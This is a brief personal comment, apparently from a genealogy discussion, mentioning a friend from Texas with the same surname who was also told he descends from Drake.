I also have a friend with the same last name as me who was also told he was a decendent of Drake, he is from Texas.

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